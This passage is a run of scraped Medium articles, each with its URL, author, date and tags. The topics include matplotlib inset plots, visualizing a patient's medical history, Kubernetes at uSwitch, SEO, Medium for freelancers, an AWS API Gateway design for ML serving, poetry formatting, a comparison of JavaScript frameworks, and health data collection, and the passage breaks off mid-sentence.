left and 60% above the Y and X axes respectively. The last two numbers 0.4 and 0.3 specifies that the plot should be 40% and 30% of the main plot’s width and height. You might have noticed that the legend of the main plot is overlapping on the inset plot. While matplotlib automatically chooses the best possible location for the legend, it can be manually moved as well using the ‘loc’ parameter. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 11 The ‘loc’ parameter takes in input between 0 and 10 corresponding to a position within the plot. 0 means that Matplotlib will choose the best possible position and it is the default option with all other integers corresponding to a location within the plot. Here I passed ‘4’ to the ‘loc’ parameter meaning the legend is placed in the bottom right corner. The last customization I will be covering will be with changing the plot background. fig, ax = plt.subplots(figsize = (12,4)) axins = ax.inset_axes([0.1,0.6,0.4,0.3] )#Left, Bottom, Width, Height ax.plot(x,y,label='X squared') axins.plot(x,1/x,label='X inverse') ax.set_xlabel('X')#X axis title ax.set_ylabel('Y')#Y axis title ax.grid(True)#Show grid axins.set_xlabel('X')#X axis title axins.set_ylabel('Y')#Y axis title axins.grid(color='blue', alpha=0.3, linestyle='--', linewidth=2)#Grid modifications ax.set_title('Main Plot') axins.set_title('Inset Plot') ax.legend(loc = 4) axins.legend() Fig 12 The main plot here has the default grid, which can be created by simply calling the grid() function. The grid lines too can be modified just like the plot lines. These modifications can be seen in the inset plot. The grid lines in it have a different colour, style and width compared to the ones in the main plot.
https://towardsdatascience.com/visualization-in-python-matplotlib-c5c2aa2620a
['Pranav Prathvikumar']
2019-10-24 20:03:31.178000+00:00
['Python', 'Data Science', 'Visualization', 'Data Visualization']
Blood and Barbed Wire
Initial meeting Despite the informality of working on the floor of my home office, I felt that I should kick off the meeting with some semi-professional expectation-setting; I let him know that my main goal was to put together visuals that would help him more effectively tell his story when seeing a new GI doctor. I also told him I was going to ask a lot of questions and he could opt out if he didn’t want to talk about something. (That seems important when crossing boundaries between friendship and informal counseling.) He’d shown up to my house with a 4-page, single spaced document in which he had written down the things he wanted to say — symptom descriptions, tests he’d had, diets and interventions he’d tried, family history, and more. The narrative contained a lot of useful information, but I could see that it could be difficult for a doctor to absorb in a short amount of time. Timeline sketch We started with a timeline of events. I had taped together four 11x17 pages and drawn a line to represent his whole life. Using his prepared narrative, we hunched over the timeline and noted key events; as we worked, he also remembered things that were not in his document. Some detail from the initial timeline Feeling good/bad Next I left the room and gave him some materials to put together a picture of what his body feels like when he’s feeling good and feeling bad. I’d prepared a sheet of icons that he could cut out and tape to the body shape, or he could simply draw on it. He took about 10 minutes to do this. When I came back, I was extremely impressed by what he had put together. I asked him to talk me through it, and as he did I wrote down quotes along the side of the image. Feeling bad: “Like barbed wire making its way through my intestines” Feeling good: At this point we had a timeline, drawings of what ‘feeling good’ and ‘feeling bad’ look like, and a list of questions and theories that had come up along the way. Key problem Aside from not getting any answers or solid reasoning for his symptoms, my friend’s biggest frustration was that new doctors kept wanting to have him try the same treatments, even though he was sure they were not helping. We decided to put together a matrix showing what ‘helps’ and ‘does not help’ along with any supporting evidence.
https://medium.com/pictal-health/blood-barbed-wire-cfef600bfdd4
['Katie Mccurdy']
2018-04-18 18:19:55.700000+00:00
['Health', 'Visualization', 'Data', 'Healthcare', 'UX']
Convergence to Kubernetes
We wanted to scale our teams further but maintain the principles of what helped us move fast: autonomy, work with minimal coordination, self-service infrastructure. Kubernetes helps us achieve this in a few ways: Application-focused abstractions We operate and configure our clusters to minimise coordination Application focused abstractions At the core of Kubernetes are concepts that map closely to the language used by an application developer. For example, you manage versions of your applications as a Deployment. You can run multiple replicas behind a Service and map that to HTTP via Ingress. And, through Custom Resources, it’s possible to extend and specialise this language to your own needs. These abstractions help application teams be more productive. The ones I’ve described above are pretty much all you need to deploy and run a web application, for example. Kubernetes automates the rest. In my iceberg picture I showed earlier these core concepts sit at the waterline: connecting what an application developer is trying to achieve with the platform underneath. Our cluster operations team can make many of the lower-level, lower-value decisions (like managing metrics, logging etc.) but have a conceptual language that connects them to the application teams above. In 2010 uSwitch operated a traditional operations team that was responsible for running the monolith and in relatively recent history had an IT team that was partly responsible for managing our AWS account. I believe one of the things that constrained the success of that team was the lack of conceptual sharing. When your language only includes concepts like EC2 instances, load-balancers, subnets, it’s hard to communicate much meaning. It made it difficult/impossible to describe what an application was; sometimes that was a Debian package, maybe it was something deployed with Capistrano etc. It wasn’t possible to describe an application in language shared by teams. In the early 2000s I worked at ThoughtWorks in London. During my interviews I was recommended Eric Evans’ Domain Driven Design book. I bought a copy from Foyles on my way home, started reading it on the train and have referenced it on most projects and systems I’ve worked on ever since. One of the key concepts presented in the book is Ubiquitous Language: emphasising the careful extraction of common vocabulary to aid communication amongst people and teams. I believe that one of Kubernetes’ greatest strengths is providing a ubiquitous language that connects applications teams and infrastructure teams. And, because it’s extensible, this can grow beyond the core concepts to more domain and business specific concepts. Shared language helps us communicate more effectively when we need to but we still want to ensure teams can operate with minimal coordination. Minimise Necessary Coordination In the Accelerate book the authors highlight characteristics of loosely-coupled architecture that drives IT performance: the biggest contributor to continuous delivery in the 2017 analysis… is whether teams can: Make large-scale changes to the design of their system without the permission of somebody outside the team Make large-scale changes to the design of their system without depending on other teams to make changes in their systems or creating significant work for other teams Complete their work without communicating and coordinating with people outside their team Deploy and release their product or service on demand, regardless of other services it depends upon Do most of their testing on demand, without requiring an integrated test environment We wanted to run centralised, soft multi-tenant clusters that all teams could build upon but we wanted to retain many of the characteristics described above. It’s not possible to avoid entirely but we operate Kubernetes as follows to try and minimise it: We run multiple production clusters and teams are able to choose which clusters to run their application in. We don’t use Federation yet (we’re waiting on AWS support) but we use Envoy instead to load-balance across the different cluster Ingress load-balancers. We can automate much of this with our Continuous Delivery pipeline (we use Drone) and other AWS services. All clusters are configured with the same Namespaces. These map approximately 1:1 with teams. We use RBAC to control access to Namespaces. All access is authenticated and authorised against our corporate identity in Active Directory. Clusters are auto-scaled and we do as much as we can to optimise node start-up time. It’s still a couple of minutes but it means that, in general, no coordination is needed even when teams need to run large workloads. Applications auto-scale using application-level metrics exported from Prometheus. Application teams can export Queries per Second, Operations per Second etc. and manage the autoscaling of their application in response to that metric. And, because we use the Cluster autoscaler, nodes will be provisioned if demand exceeds our current cluster capacity. We wrote a Go command-line tool called u that standardises the way teams authenticate to Kubernetes, Vault, request temporary AWS credentials and more. Authenticating to Kubernetes using u command-line tool I’m not arguing that Kubernetes has increased our autonomy, although that may be the case, but it’s certainly helped us maintain high levels of self-service and autonomy while reducing some of the pain we felt.
https://pingles.medium.com/convergence-to-kubernetes-137ffa7ea2bc
['Paul Ingles']
2018-06-25 13:29:15.825000+00:00
['Lean', 'Agile', 'Kubernetes', 'DevOps', 'AWS']
How SEO Works In 2017
How SEO Works In 2017 The way SEO works has changed. Here’s what you need to know. The way SEO works has changed. Here’s what you need to know. Most purchasing decisions start with a Google search and as such, SEO should still be your #1 source of new traffic, new leads and new revenue. If it’s not, then this is what to do about it. If it is, then this is how to keep it that way. How SEO used to work When Google started it was one single internet search engine… You would log on to google.com and perform a search: And regardless of who or where you were, you would have seen the same list of businesses from all around the world. At the time, this was fine. Google was just getting started, the internet wasn’t very big and there wasn’t that many people using it. But it was growing. And it got bigger. Much bigger. In 1998, there were 2.4 million websites on the internet. Today, there are over 1.2 billion. And it’s growing by the second: As the volume of websites on the internet grows, so does the volume of people doing Google searches: With this much data to process, and this many users to serve, it no longer made sense for Google to show everyone around the world the same list of results. And that’s how we got localised search engines like: The idea being, to show all users search results that were geographically relevant to their individual location. As the growth continued, so did the localisation to the point that most people are familiar with today which is ‘city based’ search engines. Whether searching a keyword with a local intent like “mechanic” or “mechanic brisbane”, most people would expect to see business that are in their local city. This is the paradigm most businesses we speak to are familiar with and has been the primary model for decision making around SEO strategy for a long time. And for a long time, it worked well. But not anymore. Why?
https://medium.com/digitaldisambiguation/how-seo-works-in-2017-279fe1c64709
['Jason Mcmahon']
2017-12-21 01:12:48.771000+00:00
['SEO', 'Google', 'Advertising', 'Marketing', 'Digital Marketing']
Is Medium Worth It for Freelance Writers?
Is Medium Worth It for Freelance Writers? It depends on your goals and how much you’re willing to invest in the platform Image by Jason McBride Medium is one of the most exciting platforms for writers. It’s easy to publish your work. There are no gatekeepers or technical hurdles stopping you. It is also much easier to find an audience on Medium than it is on a traditional blog. Even better, if you want, you can get paid for your work directly from the platform. You don’t have to sell a course or affiliate products — you can get paid based on the amount of time people spend reading your words. However, if you are a professional writer, you have to guard your time carefully. Is it worth it to write on Medium? The answer depends on what you want to get out of the platform. I have been a freelance writer making a full-time income online for over eight years. I joined the Medium Partner Program in 2018. The most I have ever made in a month from the Partner Program is $1,070 in August of this year. Last month I made $533, and this month I will probably make another $500. I am not a high earner here. I have also taken long breaks from the platform because of health issues and my freelance business demands. However, I keep coming back to Medium for three reasons: It’s fun to write here Every article I write becomes a tiny digital asset Writing on Medium is great for my business Why Do You Want to Write Here? If you want to write on Medium because it’s an easy way to make money, you are wasting your time. Only 6% of writers make over $100 any given month. The highest-earning writers, the ones that earn six-figures a year just from the Partner Program, have spent years writing tons of articles. They have worked their asses off to build a loyal audience, and they have written a ton. I know writers who make significant money on Medium. You could be one of them if you want to, but it takes a lot of work. Other than looking for a shortcut to fame and fortune, there are no wrong reasons for writing on Medium. It can be an excellent way to earn some extra money. It can also be an excellent way to improve your writing skills and to meet other writers and editors. Before you decide if writing on Medium is worth it for you, you need to have a plan for how you will use the platform. Ways to Use Medium to Help Your Career Except for my first month, I have always earned at least $100 on Medium. Even when I went six months without publishing anything on the platform because I was dealing with kidney cancer, my articles were still earning a little bit of money every day. You can earn some passive income from Medium if you have a large enough backlist of curated articles. The more I publish, the more I make from the Partner Program. As much as I love getting paid directly from Medium, the reason I keep coming back here is that there are other ways to make money from writing here. I have made much more money from clients that have hired me after reading one of my posts on Medium than I ever have from the Partner Program. It’s not even close. If you are a freelance writer, Medium lets you get paid to build a portfolio. Clients can see that you have the knowledge and skills to help them. Through your writing, they get to know you before they even contact you. Another way Medium helps freelancers is that it allows you to build an email list. Building an email list will help you grow your writing business because you can take your audience with you, no matter where you go. Medium could disappear tomorrow. If you have an email list, you can direct your biggest fans to your next project. Some writers on Medium have leveraged their work here to get book deals and sell articles to magazine publishers. When you consistently put good work out into the world, people eventually take notice. Medium helps you get noticed faster. No matter what kind of writer you want to be, Medium can help you take the next step in your career if you are strategic. Changes in the Platform This doesn’t mean Medium is perfect. There is always a danger to publishing on a platform you don’t control. Medium is always changing. Sometimes the changes require you to shift the way you use the platform. Currently, Medium is changing the look of the platform and tweaking how stories are found. If you are interested in succeeding here, it doesn’t do any good to complain. You always have the same choices. You can quit, you can refuse to adapt and fade into obscurity, or you can evolve with the platform. I’ve been lucky here. Every change Medium has made since I joined in 2018 has made it easier for me to make money. However, the current changes require me to adapt. I still believe that Medium is good for me financially and creatively. But, I have changed how I use the platform. Future Strategy In the past, I have used my two main publications, Escape Motivation and Weirdo Poetry, to build two very different audiences. This has always been difficult, and with the new changes, it may be impossible for me. My new strategy is to create a new account to publish poetry, humor, comics, and visual essays in Weirdo Poetry while using this account to post stories about writing, freelancing, marketing, and business. I will still publish 99% of my work in Escape Motivation. I suspect it will take a long time for my new account to ever make $100. The kind of short creative work I write there is not easy to monetize on Medium. My main goal for the other account is to build an audience and experiment with different forms. My new account is about creative expression. I want to make it profitable, but creativity is the primary goal. The focus of this account will continue to be making money by helping freelancers, solopreneurs, and small businesses. That strategy has worked well for the past two years, and I don’t see any reason to change. I am going to be publishing more regularly on both accounts. If you are interested in my new account, you can find it here: You Get Out What You Put In Is Medium worth it for freelancers? Yes! If you are willing to invest time in building a library of useful content for your audience, it is worth the effort to write here. However, you will have to decide what your strategy will be. You have a lot of different options. But, while I believe you can do anything — you can’t do everything. You will only succeed if you commit to a strategy.
https://medium.com/escape-motivation/is-medium-worth-it-for-freelance-writers-4f9de8cc7ccb
['Jason Mcbride']
2020-10-15 07:53:07.286000+00:00
['Work', 'Freelancing', 'Business', 'Creativity', 'Writing']
An Open Letter To My Favorite Writer About Pinning Stories On Your Profile Page
A humble request from a dedicated reader I know this is going to sound weird so please don’t hold it against me but I’m having an awful time accessing your articles. Every time I show up on your page, I notice the entire first page of stories are pinned stories that you’ve been writing over the past 6 months. These are your greatest hits. The four stories on your profile page are all pinned. The next page has four more pinned stories. The third page had four more pinned stories. I only find your newest post on the fourth page. This morning, I found your new post about adopting stray cats on the fifth page. It took me 8 minutes to get to your newest story. I don’t mind doing this for you and will continue to wade through all your pinned posts but I have a humble request for you today? Can you have a few less pinned posts so we see your latest article towards the top of your profile page? Reading your stories used to take a few minutes but now it’s taking me 8 minutes to even get to your latest post. I have to stumble through all of your greatest hits before I find what I’m looking for. Only after the 8 minutes do I get to your post and spend another 7 minutes reading it. What used to take me 7 minutes takes closer to 15 these days. I’m asking for your assistance and come to you with the most simple request to put your latest story on page 2 or at least page 3 of your profile. If you can help me cut down the searching time for your newest post by half, I would be ever so grateful. An earnest plea to get some of my time back Don’t get me wrong. I have nothing against your 16 pinned posts but I just would like to get in, read and get out. Currently, it feels like I need to plan a trip to the city known as your profile page. I have no google map on how to get there and little instructions when I do there. I go around in circles searching through publication dates to find your most recent post. Posting a few less of your pinned posts upfront will help me get to what I’m looking for sooner. I’m humbly requesting that you give me a little bit more of my time back. Each 4 minutes that I can save from finding your most recent post allows me to read someone else’s post or even one of your old posts. I mean no offense or harm. I am no hater or troll. I come with genuine gratitude and an earnest plea. Thank you for understanding and I look forward to seeing your latest post soon. I hope I won’t have to spend the regular 8 minutes to find it by going through all the pinned posts. Your reader and fan, Pinned Out p.s. This is in no way a bribe but I just donated another $20 to your KoFi account. You can use it for coffee or to pay for your Medium subscription or for groceries. I ask nothing in return. You don’t have to move your latest story to the top of the profile page but if you did, I would be forever grateful and there may be more KoFi donations coming your way.
https://medium.com/the-haven/an-open-letter-to-my-favorite-writer-about-pinning-stories-on-your-profile-page-666ac9cee9d4
['Vishnu S Virtues']
2020-12-09 22:29:13.236000+00:00
['Language', 'Creativity', 'Psychology', 'Culture', 'Lifestyle']
Implementation of the API Gateway Layer for a Machine Learning Platform on AWS
After defining some of the main concepts in the API world in the previous article, I will talk about the different ways of deploying an API Gateway for the Machine Learning platform. In this article, I will use the infrastructure and software layers designed in one of my previous articles. You may want to go through it to have a clearer view of the platform’s architecture before proceeding. As a reminder, the scope of this series of articles is the model serving layer of the ML platform’s framework layer. In other words, its “API Gateway”. Scope of this series of articles, by the author Now let’s start designing! A question may arise: If we are in an AWS environment, why not just use the fully managed and serverless AWS API Gateway? You never know if you don’t try. So let’s try this! 1 | Just the AWS managed API Gateway Here’s how AWS API Gateway could be placed in front of an EKS cluster. AWS API Gateway for the API Gateway layer, by the author First of all, AWS API Gateway is a fully managed service and runs in its own VPC: so we don’t know what’s happening between the scenes or any details about the infrastructure. Thanks to AWS documentation, we know that we can use API Gateway private integrations¹ to get the traffic from the API Gateway’s VPC to our VPC using an API Gateway resource of VpcLink². The Private VpcLink is a great way to provide access to HTTP(S) resources within our VPC without exposing them directly to the public internet. But that’s not all. The VpcLink is here to direct the traffic to a Network Load Balancer (NLB). So the user is responsible for creating an NLB which serves the traffic to the EKS cluster. With the support of NLB in Kubernetes 1.9+, we can create a Kubernetes service of type LoadBalancer With an annotation indicating that It’s a Network load balancer³. That would be a correct setup for the AWS API Gateway on EKS. We could as well benefit from WAF support for the managed API Gateway. The problem with this setup is we have the power of an API Gateway, but it’s far away from our cluster and our services. If we want to use a specific deployment strategy for each service, it would be great if this is done very close to the service (like in the service’s definition itself!). 2 | API Gateway closer to our ML models! Here’s another way of doing things. Design components: AWS API Gateway + NLB + Ambassador API Gateway. AWS API Gateway Combined with Ambassador for the API Gateway layer, by the author In this setup, we put an open-source API Gateway solution closer to our services. I will talk in detail about Ambassador in a future article. For now, let’s just say it’s a powerful open-source API/Ingress Gateway for our ML platform that brings the API Gateway’s features closer to our models. So do we really need the AWS API Gateway? Not really… One downside though, we will lose the WAF advantages for sure if we don’t use the AWS API Gateway. But maybe we can optimize it more! 3 | Eliminate the AWS API Gateway! So let’s eliminate the AWS API Gateway. Design components: NLB in public subnet + Ambassador API Gateway. Public AWS NLB Combined with Ambassador for the API Gateway layer, by the author We just need to put the NLB in a public subnet so that we can receive the public traffic. However, NLB doesn’t understand HTTP/HTTP(s) traffic, it allows only TCP traffic, no HTTPS offloading, and they have none of the nice OSI’s layer 7 features of the Application Load Balancer (ALB). Plus, with an NLB, we still can’t have the advantages of WAF. 4 | Our final design! So, here’s the final setup. Design components: ALB in public subnet + WAF + NLB in private subnet + Ambassador API Gateway. Final setup for the API Gateway layer, by the author As WAF integrates well with Application Load Balancer (ALB), why not get an ALB in front of the NLB. We can get that NLB back to its private subnet as well. One thing to pay attention to though: In this setup, AWS ALB cannot be assigned a static public IP address. So, after some time, the ALB’s IP changes and we lose access to the platform. Two possible solutions: 1. Summon the almighty Amazon Route53: We need to use the DNS name of the ALB instead of its changing IP addresses. To do this: a. We have to migrate our nameservers to Route53 if it’s not already the case. b. Pay attention to mails redirection: Route53 is only a DNS resolver and does not redirect emails. A solution for this could be to use an MX record and a mail server (like Amazon WorkMail). 2. Use AWS Global Accelerator: we never get bored with Amazon. Recently, Amazon launched this new service which could easily solve such a problem. A global accelerator with 2 fixed IPs and a unique DNS name will receive the traffic and direct it to an endpoint group containing our ALB. Here’s a detailed guide on how to use this new feature. Conclusion In this article, I tried to study different deployments of an API Gateway for the Machine Learning platform. Starting from simply using an AWS API Gateway, I tried to find an optimal setup with maximum use of AWS advanced features like WAF. In the next article, I will discuss in detail Ambassador and various concepts behind its existence. If you have any questions, please reach out to me on LinkedIn. [1] https://docs.aws.amazon.com/apigateway/latest/developerguide/set-up-private-integration.html [2] https://docs.aws.amazon.com/apigateway/api-reference/resource/vpc-link/ [3] https://kubernetes.io/docs/concepts/services-networking/service/#aws-nlb-support
https://medium.com/swlh/implementation-of-the-api-gateway-layer-for-a-machine-learning-platform-on-aws-589381258391
['Salah Rekik']
2020-11-19 17:33:26.913000+00:00
['Machine Learning', 'Api Gateway', 'AWS', 'Technology', 'Cloud Computing']
A Comprehensive Guide To Publishing Poetry On Medium
A Comprehensive Guide To Publishing Poetry On Medium Best Practices, Tips & Tricks, and What Not To Do Photo by NordWood Themes on Unsplash This is for anyone who publishes poetry or plans to, on Medium. Offline poetry is something different. The formatting options and creative iconography are endless. In our journals or on our typewriters, or even in a document, we can use spacing for emphasis. We can freely indent on a piece of paper the exact amount we think is necessary to tell a small part of the story, without using more words. But this is Medium. When it comes to poetry on Medium, there aren’t many formatting options and I know you may think this is an odd thing to say, but I think that’s a good thing. A site like this is visually pleasing because of its consistency. Even though we are all different as writers, the limited formatting options make the screen pretty similar no matter who you are reading. Poets don’t like this. Poets on Medium try to come up with ways to use formatting to enhance their work, but the truth is, there isn’t much you can do. And isn’t it a better thing that the full breadth of power has to come from our words on here? I think it is. Would I like an easier way to indent once in a while? Actually, no, but I bet some would. But we can only work with the options we are given. Part of my goal in writing this is selfish. I edit and publish so much poetry between Assemblage and Loose Words, that I wanted to give an overview of the errors I see the most. And some of these things aren’t errors so much as oversights or just something missed when you are new to the platform. Either way, it will help you as much as it will help me. Hopefully more.
https://medium.com/loose-words/a-comprehensive-guide-to-publishing-poetry-on-medium-ae2535e29b43
['Jonathan Greene']
2020-05-27 12:24:25.524000+00:00
['Guides And Tutorials', 'Poetry', 'Creativity', 'Writing', 'Poetry On Medium']
Angular vs. React vs. Vue
Angular vs. React vs. Vue: Spot the Difference The comparison of these three frameworks (Angular versus React versus Vue) will help you to have a clear perspective regarding the perfect framework as per your project requirements. When you have an important project with several bottlenecks, you require a comprehensive understanding of these technologies so you can choose the apt framework. That’s the basis of this article: to detail the essential factors for each framework and to help you to pick the right one among them. 1. Angular vs. React vs. Vue: Popularity According to a 2019 Stack Overflow survey, React is the most desired framework (74.5% of developers preferring it), and Vue is right behind it with 73.6% of developers embracing it. Both React and Vue have a similar number of users. The number of users for Angular isn’t the same as before, but, even so, more than 50% of users still love Angular. Google Trends can dictate the popularity of Angular, React, and Vue among developers. As per Google statistics, React is the most popular framework, followed by Angular and Vue. React easily grabs the attention of developers because of its well-built and secure structure. Although, there’s no denial that Angular and React are used by big names in the software industry: Google uses Angular for their projects, whereas brands like Airbnb, Dropbox, Facebook, WhatsApp, and Netflix are keen on React for development. 2. Angular vs. React vs. Vue: Performance Performance is considered to be the most prominent aspect for a front-end developer during development, whether you choose Angular, React, Vue, or any other framework. And to determine that, you need to understand the performance. Let me help you with that. It is a known fact that DOM is seen as the UI for frameworks. It’s a vital fact that React and Angular take different methods to modernize HTML files, but Vue is the one that brings out the best result. Angular The good: Angular is the most popular framework for JavaScript because it practices real DOM, and it’s the best option for single-page-applications due to the coherent update. Apart from that, Angular goes with a Two-Way Data binding process that recreates the changes from the Model into the views in a safe, efficient, and automatic method. Liability: Due to several features of this framework, during the translation of heavy applications, it slows down the performance. React: Goods: React is a front-end library that applies the Virtual DOM to enhance the performance for all size applications that require frequent content up-gradation, such as Instagram. The base of React is single-direction data flow to have better authority over the project. Liability: The constant changes and development in React demand upgraded and skilled programmers regularly, so sometimes the tech giants are not comfortable working with React. Vue: Goods: Being the youngest member Vue has its perks because Vue doesn’t need to deal with those issues which earlier arose in Angular and React. Vue.js development company provides high performance and memory allocation with all the enhanced features. Liability: Vue has the smallest community support because it’s a novice member of the JavaScript family. 3. Angular vs React vs Vue: Top Use Cases for web development Angular Angular is actively used in its AdWords applications for maximizing the performance because Google is the founder of it. These are the famous web resources that utilize Angular, such as Lego, PayPal, Nike, Weather.com, and The Guardian. 2. React It was specifically designed for Facebook, and it still uses React actively for various product creation. The list of React users goes as, Instagram, Twitter, Whatsapp, and WordPress as well. 3. Vue.js Vue doesn’t have strong allies to implement its products, like Angular and React. Although, in a short span, popular brands such as GitLab, 9Gag, Nintendo, and Grammarly are associated with Vue due to its flexibility. 4. Angular vs React vs Vue: Framework size Angular (around 500 KB): Angular development has a wide range of features that enables developers to create templates to test utilities. For your next project if you want to develop large-scale feature applications, then Angular is the one for you. 2. React (around 100 KB): React is the right framework for modern web development because, with React development, you don’t have to worry about the big spectrum of libraries. 3. Vue (around 65 KB): As per the size of Vue framework and library, it’s suitable for the light-weight application, and for the complex application you need to go with Angular development. 5. Angular vs React vs Vue: Learning curve The learning curve is defined as the capability of users to write codes in a specific programming language. It’s time for us to understand the learning curve of each framework. Vue: Among these three frameworks, Vue.js has the easiest learning curve. And the reason is it’s nearest to the JavaScript basics and HTML. You can consider the start of this task as easy as adding an import to HTML. However, as you create a more complex application, it starts to get complicated. But to tackle the complexity you should use .vue file for the project. 2. React: The learning curve of React.js has a medium to steep learning curve compared to Angular and Vue. React has an “everything is JavaScript” strategy. However, it still has these two essential elements that make the learning curve steeper. ES6 Syntax that syncs perfectly with react, although it’s complex for the beginner. React uses JSX syntax, which is a mixture of JavaScript and HTML, that confuses a lot of users because it forms the image of HTML and works like JavaScript. 3. Angular: The use of TypeScript makes the learning curve of Angular steepest among these three frameworks. Also, the components, syntax, and modules look different than you used to before. Although, the powerful features of it help Angular developers to build applications following certain coding patterns. 6. Angular vs React vs Vue: Scalability Concerning front-end development, scalability often relates to the ability to maintain expanding functionality. That means, applications must increase in size and complexity, and the development platform needs to support such extension. The community developers’ is consistent about both Angular and React, that they both are the best for the task when it’s about building scalable applications. Angular focuses on scalability with its modular development composition, while React obtains to go with a component-based method for the result. However, in terms of scalability, Vue is way too much behind, due to its template-based syntax. As you might know, templates do not go along with large applications as much as JavaScript components. The Choice is Yours There is no doubt that all three frameworks have their perks and downsides. Choosing the best one of these three frameworks entirely depends on the requirements of your project. For instance, in case you want large applications, then Angular development is one for you, of course, if you’re satisfied with TypeScript. Otherwise, React is also suitable for large apps. However, if you like adventure and want to experiment with something newfangled and promising then Vue.js is your framework. I hope the comparison of Angular Vs React Vs Vue assists you to pick the best framework for JavaScript for your future development project.
https://medium.com/swlh/angular-vs-react-vs-vue-802a7c5f7e50
['Nelly Nelson']
2020-11-02 14:33:13.117000+00:00
['Angular', 'Programming', 'React', 'JavaScript', 'Vuejs']
To Be or Not To Be (2020)
Get this newsletter By signing up, you will create a Medium account if you don’t already have one. Review our Privacy Policy for more information about our privacy practices. Check your inbox Medium sent you an email at to complete your subscription.
https://medium.com/merzazine/to-be-or-not-to-be-2020-3a2f194ae0f
['Vlad Alex', 'Merzmensch']
2020-11-20 11:03:32.338000+00:00
['Videos', 'Artificial Intelligence', 'Music', 'Art', 'Culture']
VJ Loop | RGB Plasmas
This blog takes the broadest conception of sound design possible including visual effects because audio likes video. Over 90,000 views annually. Follow
https://medium.com/sound-and-design/vj-loop-rgbplasmas-424755ae248b
["Michael 'Myk Eff' Filimowicz"]
2020-12-29 02:26:36.212000+00:00
['Design', 'Flair', 'Technology', 'Creativity', 'Art']
Here’s Why We Need Health Data Collection
Opinion Here’s Why We Need Health Data Collection Tech can enable valuable experiences with your health data Image by Lukas on Unsplash Our data is constantly collected, from YouTube history to calendar reminders to daily workouts, all possible due to rapid technological growth. According to the National Center for Biotechnology Information, 58% of U.S. cellphone users have downloaded a health-related app onto their devices, but an even greater percentage already had pre-installed software that saved health data (Krebs & Duncan, 2015). Your data, combined with millions and even billions of other people’s, creates big data, or incredibly large datasets. Over time, methods of data collection have evolved, paralleling the developments in science and technology that have allowed companies to harness massive datasets shaping the modern products at our fingertips. As technology becomes an even stronger influence in our daily lives, it is imperative to understand the effects of this kind of data collection from the technological lens and consider multiple perspectives within it. Image by James on Unsplash A prime stakeholder in the debate of health data collection is undoubtedly major technology companies, namely Apple, Amazon, Facebook, Google, and Microsoft. These companies see healthcare as a brilliant but somewhat untapped opportunity to expand innovation and spur economic growth. Jia Low, an author at TechHQ, an independent current technology and business news site, examines why these companies are eager for health data. She discusses that in 2019, Google partnered with Ascension, one of the largest healthcare providers in America, and acquired FitBit. Both of these sources accumulated heaps of patient records from around the world. With this data, Google claims it wants to aid doctors and hospitals in managing their patients more effectively and quickly via electronic health records (EHRs), which make up an astounding 80% of health records today. Amazon is a strong competitor in cloud storage, and its 2018 purchase of the online prescription service PillPack signals its push to target healthcare. The wealthiest tech giant is Apple, which puts privacy at its forefront. Apple is investing in users’ health data to make its Health platform a seamless, more reliable “middleman” in personal health management. Portable devices like the Watch and iPhone (both of which teem with health apps and features) have had positive impacts. Low cites that in 2019, the Watch detected a biker’s severe fall and contacted 911, thus saving his life. Mark Zastrow, a well-regarded writer from the prestigious peer-reviewed Nature scientific journal, covers Apple and Google’s recent collaboration on their joint COVID-19 contact tracing app that will provide more accurate feedback on infected people and notifications for those who came into contact with someone who tested positively. He points out that together, they have solved many of the privacy and efficiency issues of prior methods by implementing encrypted keys and eliminating access to personally-identifying data. Both Low and Zastrow agree that with appropriate privacy measures — encryption, pseudonyms, on-board processing, strong algorithms, and the like — technology companies have just intentions and share a goal of inventing for the betterment of society. It is clear that technology companies provide new innovations targeted to help manage the health of their users, but it is crucial to investigate how users incorporate them into their lives. According to a study by Rock Health from 2015 to 2018 on 4,000 U.S. adult respondents, users have adopted these tools at a record rate: in 2018, 89% of those surveyed used one or more health tools on their devices, an increase from 80% in 2015 and proof that user traction has improved. Authors Sean Day and Megan Zweig from the nationally-recognized technology and health funding company Rock Health construct their argument by discussing the common means through which data is collected: live video telemedicine, wearables, mobile tracking, online reviews, and online health information. In 2018, wearable use began shifting more towards managing health conditions and diagnoses rather than tracking fitness. Additionally, the authors note positive impact of health data collection by reporting that users rated the tools an average of 4.1 out of 5 stars, a high performance. Image by Daria on Unsplash A second way to explore users’ opinions on technology companies handling their health data is trust levels. Lance Lambert, a graduate from Duke University and the University of Cincinnati working at Fortune as a data analyst, reports on a study conducted by Fortune that surveyed 1,267 randomly selected U.S. adults. Lambert first describes that many respondents liked health tracking apps and devices, because it was “illuminating” to “see [their lives] told by the minute.” He clarifies that unfortunately, many users are unaware that their data is stored; even though they technically provide consent before using health data collection apps, they often disregard the “fine print.” It was found that 40% of the respondents are fully willing to have their data utilized by Amazon and Apple, with smaller percentages for Google and Facebook. Interestingly, this demonstrates that many people are in a paradox: they utilize digital health data tools widely and regularly but are also wary of technology companies using that data to their, and potentially the public’s, benefit. Image by Campaign Creators on Unsplash A third role involved heavily is healthcare professionals, specifically doctors. James Gaston, the senior director of data modeling at Healthcare Information and Management Systems Society, says, “[Our cultural definition of healthcare] is moving away from a brick-and-mortar centric event to a broader, patient-centric continuum encompassing lifestyle, geography, social determinants of health and fitness data in addition to traditional healthcare episodic data.” The sheer volume of health data being collected implies that it accurately represents its target audience, significantly improving a more time-consuming, costly, and ineffective policy of direct doctor-patient communication. He asserts that if limited data is collected by only doctors and analyzed at too granular of a level, patterns will be difficult to spot and consequently, innovation will decrease. Medical data from users’ devices combined with doctor-specific sessions incorporates a large array of different types of data — from search queries, app statistics, and wearable outputs to environmental factors and individual lifestyles — and thus provides more informative results. This process of leveraging big data and technology to assist individualized healthcare without a doctor physically present is called telemedicine. Constant collection streaming through patients’ devices, as proved with Apple and Samsung users, can allow doctors, families, and users themselves to consistently track overall health and improve care, says Valarie Romero a telemedicine professor at The University of Arizona. Other scholars oppose her. Gina Neff, a senior research fellow and Associate Professor in the Department of Sociology at the University of Oxford, quotes an anonymous physician in her survey: “I don’t need more data; I need more resources.” She explains that big data is valued in various ways by different people, so some professionals believe data-intensive solutions take excessive time away from providing quality care. Neff claims that creating healthcare solutions built off of vast data collection does not assess multiple viewpoints well. It is 